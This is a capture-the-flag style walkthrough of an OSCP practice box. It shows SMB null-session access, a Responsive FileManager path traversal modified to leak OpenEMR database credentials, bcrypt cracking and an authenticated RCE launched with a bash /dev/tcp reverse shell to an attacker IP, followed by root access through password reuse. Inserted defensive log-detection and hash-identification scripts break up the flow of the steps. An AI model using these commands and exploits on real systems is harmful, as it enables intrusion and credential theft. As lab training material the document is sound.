I did this OSCP Proving Grounds box in preparation for the OSCP exam. Hope you enjoy, and if there is any way I could improve these walkthroughs by either elaborating more or making it more concise, please let me know. Thanks!
NMAP
[+] Let’s start with identifying all open ports and then enumerate deeper with specific nmap options
export ip=192.168.160.145 # a shell variable so I don't have to type the full IP every time or remember it.
nmap -p- -T4 --open $ip
rustscan -A $ip --ulimit 5000 # super port enumeration tool that verifies if my initial scan with nmap is accurate.
nmap -A -T4 -p 80,445 $ip -oN nmap.fulltcp


Port Enumeration
[+] I always leave port 80/443 last because there are many paths you can take with it. Our nmap scan results show that it had a successful connection as the user guest, so let’s test an SMB null session.
smbclient -N -L \\\\192.168.160.145

Great, we have listed the shares via a null session. There is also a non-default share named docs.
[+] I can try connecting to the share and then download all files to our kali machine
smbclient \\\\192.168.160.145\\docs
mget *

[+] We got the pdf files. Now it’s time to open them and see if they have any credentials, directories/domains we are unaware of, or any applications, tools, software, or version information we can leverage to gain a foothold.

[+] Let’s do a quick Google search about what OpenEMR is even about.

Based on this description, the target is most likely using this software for their business needs.
[+] Even though we do not have a version number, we still have the name of the software and doing a quick searchsploit can give us valuable information.
searchsploit "OpenEMR"

Woah, we hit a goldmine.
The good news is that this indicates OpenEMR is most likely vulnerable to some exploit. The bad news is that we have a lot of possible avenues. Let’s check out port 80 and see if we can narrow the search. It could lead to the login page and have the version number.
Web Enumeration
[+] I like to start some automated scans and leave it running in the background while I work on my manual enumeration methodology. I’ll typically start a directory busting tool, and a vulnerability scanner like Nikto.
nikto -h http://192.168.160.145 # vulnerability scanner
feroxbuster -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # directory busting tool

Nothing really stands out.


Feroxbuster does recursive searches by default, and I have really started to like this tool. We see the path to the openemr application, along with many other files. We could probably search for openemr on GitHub to get a visual idea of what all these files are and what they contain.

We also get this interesting filemanager directory.
[+] I think it’s a good time to actually navigate the site and see what’s available to us.


We get some possible users and also the domain name that we could add to our /etc/hosts file.
[+] Let’s check out our OpenEMR login portal for any leaked information like a version number.


Neither the login page nor the source code reveals the current version.
Default/common credentials also do not work here.
[+] At this point, understanding the installed software, its files and directory structure, and checking whether its configuration file holds any default credentials is our logical next step.

Very interesting: we have a MySQL server in the mix now and we also have the default credentials to access it. However, we cannot access it yet since we do not have a foothold on the system.
Exploitation
[+] Investigating the hit on the filemanager directory we have file upload functionality which is great and we also get a version number.

Version v.9.13.4
[+] Search for exploits on this software
searchsploit "responsive filemanager"
searchsploit -m 49359 # downloads the exploit by its EDB-ID

We get a hit for our exact version – Path Traversal.
[+] Let’s check out how our exploit functions and what requirements it needs to execute successfully.
cat 49359.py

It looks like we need a PHPSESSID, which is fairly simple to get. Looking at the functions used in this exploit, it copies our file, pastes it into the path we specify, and then outputs the contents of the file.
[+] Getting the PHPSESSID
curl -s -D - http://192.168.160.145/filemanager/ | grep PHPSESSID
# -s is silent mode
# -D dumps the headers. PHPSESSID is found within the headers
python3 49359.py http://192.168.160.145 PHPSESSID=2cbs85j2tdsc9r8s7j0jlb31uf /etc/passwd


The exploit works, and mysql is indeed in the /etc/passwd file.
[+] With the POC working, let’s try retrieving the sqlconf.php file.
python3 49359.py http://192.168.160.145 PHPSESSID=2cbs85j2tdsc9r8s7j0jlb31uf /var/www/openemr/sites/default/sqlconf.php

We know the exploit works, but we did not get to “read” the contents of the file. It seems like the copy/paste functions worked but something occurred during the read function.
[+] Going back through my initial findings, our smbclient connection showed a docs share we are able to read that had 2 files in it. These are the exact same files that are found in the path /filemanager/documents. We can modify the paste function to point to Documents and see if we can see the file via our smb null session.
import requests

def paste_clipboard(url, session_cookie):
    headers = {'Cookie': session_cookie, 'Content-Type': 'application/x-www-form-urlencoded'}
    url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
    # Paste target changed from the exploit's original path to /Documents,
    # the directory that is exposed through the docs SMB share.
    r = requests.post(url_paste, data="path=/Documents", headers=headers)
    return r.status_code

The paste_clipboard path has been modified.
[+] Let’s run the exploit and check via smb.
python3 49359.py http://192.168.160.145 PHPSESSID=2cbs85j2tdsc9r8s7j0jlb31uf /var/www/openemr/sites/default/sqlconf.php # exploit
smbclient -N \\\\192.168.160.145\\docs # connect via the null session
get sqlconf.php # downloads the file to our machine
!cat sqlconf.php # the ! lets us run native commands within the smb session

We got some creds!
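From the defender's side, the chain above leaves a recognisable trace in the web server's access log: a scripted client calling execute.php with the paste_clipboard action, next to traversal sequences in request paths. The script below is an added example and not part of the post or the exploit; it triages constructed Apache combined-format lines (the IPs, timestamps and user agents are placeholders), and the "non-browser user agent" check is a heuristic, not a rule from the page.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format lines (placeholder IPs, timestamps and agents);
# not captured from the target.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2023:10:00:01 +0000] "GET /filemanager/ HTTP/1.1" 200 5120 "-" "curl/7.88.1"
10.0.0.5 - - [10/Jan/2023:10:00:02 +0000] "POST /filemanager/execute.php?action=paste_clipboard HTTP/1.1" 200 12 "-" "python-requests/2.28.0"
10.0.0.5 - - [10/Jan/2023:10:00:03 +0000] "GET /filemanager/source/..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 196 "-" "python-requests/2.28.0"
10.0.0.9 - - [10/Jan/2023:10:05:00 +0000] "GET /filemanager/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

BROWSER_PREFIXES = ("mozilla/", "opera/")

def parse_line(line):
    """Parse one combined-format line into a dict; return None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return entry

def classify(entry):
    """Return the reasons a single request looks like filemanager abuse (empty if none)."""
    reasons = []
    path = entry["path"].lower()
    # The call the exploit makes (and the post modifies) to move a copied file.
    if path.endswith("/filemanager/execute.php") and entry["query"].get("action") == "paste_clipboard":
        reasons.append("execute.php paste_clipboard call")
    # Decode %2F etc. before looking for dot-dot so encoded traversal is caught too.
    if "../" in unquote(entry["target"]).replace("\\", "/"):
        reasons.append("dot-dot traversal sequence")
    # Heuristic: the file manager is a browser UI, so curl/python clients are unusual.
    if path.startswith("/filemanager/") and not entry["ua"].lower().startswith(BROWSER_PREFIXES):
        reasons.append("non-browser user agent")
    return reasons

def find_suspicious(log_text):
    """Group flagged requests by client IP: {ip: [(method, target, reasons), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits[entry["ip"]].append((entry["method"], entry["target"], reasons))
    return dict(hits)

if __name__ == "__main__":
    for ip, events in find_suspicious(SAMPLE_LOG).items():
        print(ip)
        for method, target, reasons in events:
            print(f"  {method} {target}: {', '.join(reasons)}")
```

Only the scripted client is reported; the browser visit to /filemanager/ from the second IP produces no reasons. Alerting on the paste_clipboard call alone is the highest-signal rule here, since a web-based file manager that can move files outside its own directory is the root cause of the path traversal.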
[+] Let’s connect to the MySQL DB and try to dump the creds to the openemr login portal.
mysql -h 192.168.160.145 -u openemr -D openemr -p --skip-ssl # connect to mysql server and the database specified
show tables;
select * FROM users_secure;

[+] We can identify the hash type and then use john to crack the hash
echo '$2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC' > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
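Instead of relying on john's autodetection, the hash type and cost can be read straight from the modular-crypt-format prefix. The helper below is an added example, not from the post: it parses the bcrypt hash dumped from users_secure (and the md5crypt/sha256crypt/sha512crypt prefixes for comparison) and reports the work factor. The "weak below cost 10" threshold is my own rule of thumb, not something the page states.

```python
import re

# Modular Crypt Format prefixes and the scheme they mark.
MCF_SCHEMES = {
    "1": "md5crypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
}
# bcrypt: $2<variant>$<cost>$<22-char salt><31-char digest>, alphabet ./A-Za-z0-9
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

def identify_hash(h):
    """Describe a $id$...$ style password hash; return None if the format is unknown."""
    h = h.strip()
    m = BCRYPT_RE.match(h)
    if m:
        variant, cost, salt, digest = m.groups()
        # bcrypt runs 2**cost rounds of its key setup.
        return {"scheme": "bcrypt", "variant": variant, "cost": int(cost),
                "rounds": 2 ** int(cost), "salt": salt, "digest": digest}
    parts = h.split("$")
    if len(parts) < 4 or parts[0] != "" or parts[1] not in MCF_SCHEMES:
        return None
    scheme = MCF_SCHEMES[parts[1]]
    # md5crypt is fixed at 1000 iterations; glibc sha*crypt defaults to 5000.
    rounds = 1000 if scheme == "md5crypt" else 5000
    salt_idx = 2
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][len("rounds="):])
        salt_idx = 3
    if len(parts) < salt_idx + 2:
        return None
    return {"scheme": scheme, "variant": parts[1], "cost": None,
            "rounds": rounds, "salt": parts[salt_idx], "digest": parts[salt_idx + 1]}

def cost_assessment(info):
    """Rough cracking-effort note (rule of thumb, not a standard): low work factors crack fast."""
    if info["scheme"] == "bcrypt":
        return "weak" if info["cost"] < 10 else "adequate"
    if info["scheme"] == "md5crypt":
        return "weak"
    return "weak" if info["rounds"] < 5000 else "adequate"

if __name__ == "__main__":
    # The hash dumped from the users_secure table in the post.
    info = identify_hash("$2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC")
    print(info["scheme"], "cost", info["cost"], "=", info["rounds"], "rounds:", cost_assessment(info))
```

The dumped hash is bcrypt at cost 5, i.e. only 32 key-setup rounds, which is why a rockyou run finishes almost immediately; bumping the application's bcrypt cost is the mitigation that makes the same dump far more expensive to crack.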

John The Ripper automatically detected the hash type and proceeded to crack it. Our credentials are admin:thedoctor
[+] These creds get us into the openemr login portal and we identify the version number in the About section.

[+] This is where the cyclical process of pentesting occurs: we have to look for any exploits for this version number. We found a lot of exploits from one of our initial searchsploit queries on openemr, but now we are able to drastically narrow down our search.

Initial Search.

After Identifying the version number.
[+] Since we have creds, the Authenticated RCE exploits should be able to get us a revshell and a foothold into the system.
searchsploit -m 45161
mousepad 45161.py # open the exploit to identify/modify the payload.
head -n 17 45161.py # shows the example usage so we can just copy it and replace the payload.
nc -nvlp 4444 # set up listener
python2 45161.py http://192.168.160.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.45.190/4444 0>&1' # exploit and payload being executed.


We’re In
Privilege Escalation
[+] We have the password for our admin user. Let’s test su for a quick win.
su

[+] We can elevate our tty and see if that works.
python3 -c 'import pty; pty.spawn("/bin/bash")'

Pwn3d!